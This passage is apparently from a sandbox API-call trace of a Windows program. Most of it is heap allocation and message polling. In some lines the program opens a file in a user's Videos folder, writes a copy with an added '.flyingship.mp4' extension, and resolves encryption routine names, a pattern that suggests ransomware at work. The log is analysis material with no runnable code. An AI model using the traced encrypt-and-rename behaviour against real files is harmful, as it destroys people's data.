dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.383] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.383] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.383] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fff18 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0199.385] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth")) returned 0x10 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff18 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0199.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0199.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0199.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\guurkoggeovl1ts9ut.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0199.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0199.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0199.388] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0199.388] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x28d3, lpOverlapped=0x0) returned 1 [0199.390] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0199.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28d3) returned 0x901190 [0199.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28d3) returned 0xbea018 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x901190 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28d3) returned 0x901190 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x901190 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0199.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0199.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0199.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.392] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0199.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28d3) returned 0x901190 [0199.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0199.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0199.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0199.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0199.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x28d3) returned 0xbec8f8 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0199.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.394] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0199.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0199.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.394] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0199.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0199.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.395] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0199.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: 